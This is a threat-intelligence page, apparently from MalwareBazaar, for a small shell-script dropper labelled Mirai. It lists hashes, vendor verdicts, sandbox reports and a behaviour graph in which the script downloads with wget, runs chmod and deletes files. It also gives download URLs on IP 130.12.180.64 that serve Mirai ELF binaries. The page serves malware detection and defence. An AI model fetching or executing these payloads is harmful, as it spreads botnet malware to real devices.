MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 18849487f938b1c9d15ff3223167f7828a9dd8ad2e2cab629e4bd43ec54e6e2c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 6


Intelligence 6 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 18849487f938b1c9d15ff3223167f7828a9dd8ad2e2cab629e4bd43ec54e6e2c
SHA3-384 hash: 420507cfbe40b5f14cf310138771e574a3a11ea0aed9f3cadee7663962b4da89bdebedb45722727e02e051b50c1046a1
SHA1 hash: 3711d03f1bf7bdbbf3a22dffe9bd605bf09a1e71
MD5 hash: a6183e78fefa0de1895755904a216cf7
humanhash: early-london-oven-winner
File name:zb
Download: download sample
Signature Mirai
Create hunting rule
File size:202 bytes
First seen:2025-12-21 15:14:17 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 3:LxAjdVZPWwVxAjdVZUaSdXJa3B0dEJvKsjFTNjEF4FT2JFE7AwFqDjKaJo4jKLJv:L6PWi6Uaka3BZhKYzEOELE7AwRkoLhn
TLSH T167D0124A300909C15D88BAE43F57307135809706D4A61A2F9DB381F3C993905F30CD28
Magika shell
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://130.12.180.64/mipstn/an/aelf ua-wget
http://130.12.180.64/mpslc3368dbe8c72d6b562974c6aa1c5a3642e0f47ebc4d79888824c8d71b5fcabfa Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
38
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
URLhaus.3739391.UNOFFICIAL
Create hunting rule

URLhaus.3739424.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Link:
https://www.filescan.io/uploads/694813b6e126b9ff438ad4d3/reports/29f9550f-f160-4a3f-ab06-fee942bcbc85/overview
Verdict:
Unknown
Link:
https://www.hybrid-analysis.com/sample/18849487f938b1c9d15ff3223167f7828a9dd8ad2e2cab629e4bd43ec54e6e2c
Verdict:
Malicious
File Type:
text
First seen:
2025-12-21T12:37:00Z UTC
Last seen:
2025-12-22T15:02:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/18849487f938b1c9d15ff3223167f7828a9dd8ad2e2cab629e4bd43ec54e6e2c/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/208128e0-b61f-4c0e-a2a0-eb572db5775c
Behavior Graph:
Download SVG
%3 guuid=724e7e05-2200-0000-757a-671d8d0b0000 pid=2957 /usr/bin/sudo guuid=e8b54507-2200-0000-757a-671d8f0b0000 pid=2959 /tmp/sample.bin guuid=724e7e05-2200-0000-757a-671d8d0b0000 pid=2957->guuid=e8b54507-2200-0000-757a-671d8f0b0000 pid=2959 execve guuid=41ef8807-2200-0000-757a-671d910b0000 pid=2961 /usr/bin/wget net send-data guuid=e8b54507-2200-0000-757a-671d8f0b0000 pid=2959->guuid=41ef8807-2200-0000-757a-671d910b0000 pid=2961 execve guuid=bada980b-2200-0000-757a-671d980b0000 pid=2968 /usr/bin/wget net send-data write-file guuid=e8b54507-2200-0000-757a-671d8f0b0000 pid=2959->guuid=bada980b-2200-0000-757a-671d980b0000 pid=2968 execve guuid=6dff8f11-2200-0000-757a-671da70b0000 pid=2983 /usr/bin/chmod guuid=e8b54507-2200-0000-757a-671d8f0b0000 pid=2959->guuid=6dff8f11-2200-0000-757a-671da70b0000 pid=2983 execve guuid=07f8f411-2200-0000-757a-671da90b0000 pid=2985 /usr/bin/chmod guuid=e8b54507-2200-0000-757a-671d8f0b0000 pid=2959->guuid=07f8f411-2200-0000-757a-671da90b0000 pid=2985 execve guuid=d7699212-2200-0000-757a-671dab0b0000 pid=2987 /usr/bin/dash guuid=e8b54507-2200-0000-757a-671d8f0b0000 pid=2959->guuid=d7699212-2200-0000-757a-671dab0b0000 pid=2987 execve guuid=88d8c612-2200-0000-757a-671dac0b0000 pid=2988 /usr/bin/dash guuid=e8b54507-2200-0000-757a-671d8f0b0000 pid=2959->guuid=88d8c612-2200-0000-757a-671dac0b0000 pid=2988 execve guuid=ad062213-2200-0000-757a-671dad0b0000 pid=2989 /usr/bin/rm guuid=e8b54507-2200-0000-757a-671d8f0b0000 pid=2959->guuid=ad062213-2200-0000-757a-671dad0b0000 pid=2989 execve guuid=3f428413-2200-0000-757a-671db00b0000 pid=2992 /usr/bin/rm delete-file guuid=e8b54507-2200-0000-757a-671d8f0b0000 pid=2959->guuid=3f428413-2200-0000-757a-671db00b0000 pid=2992 execve f22fee75-ab34-540d-95fe-696883c6f4ad 130.12.180.64:80 guuid=41ef8807-2200-0000-757a-671d910b0000 pid=2961->f22fee75-ab34-540d-95fe-696883c6f4ad send: 133B guuid=bada980b-2200-0000-757a-671d980b0000 pid=2968->f22fee75-ab34-540d-95fe-696883c6f4ad send: 132B
Score:
98%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/18849487f938b1c9d15ff3223167f7828a9dd8ad2e2cab629e4bd43ec54e6e2c
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/18849487f938b1c9d15ff3223167f7828a9dd8ad2e2cab629e4bd43ec54e6e2c/
Threat name:
Script-Shell.Downloader.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2025-12-21 15:35:22 UTC
File Type:
Text (Shell)
AV detection:
2 of 24 (8.33%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=dccjjb7zhcy4tuk76mrdcz7xqkfj3wfnfywkwyu6jpkd5rkonywa._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/251223-lmm8fsskax/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/18849487f938b1c9d15ff3223167f7828a9dd8ad2e2cab629e4bd43ec54e6e2c

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 18849487f938b1c9d15ff3223167f7828a9dd8ad2e2cab629e4bd43ec54e6e2c

(this sample)

Mirai

elf c3368dbe8c72d6b562974c6aa1c5a3642e0f47ebc4d79888824c8d71b5fcabfa

  
URLhaus
https://urlhaus.abuse.ch/url/3739345/
  
Delivery method
Distributed via web download
  
Dropping
MD5 20124a7754ab1e6fce3c13fe09d38e05
  
Dropping
SHA256 c3368dbe8c72d6b562974c6aa1c5a3642e0f47ebc4d79888824c8d71b5fcabfa

Comments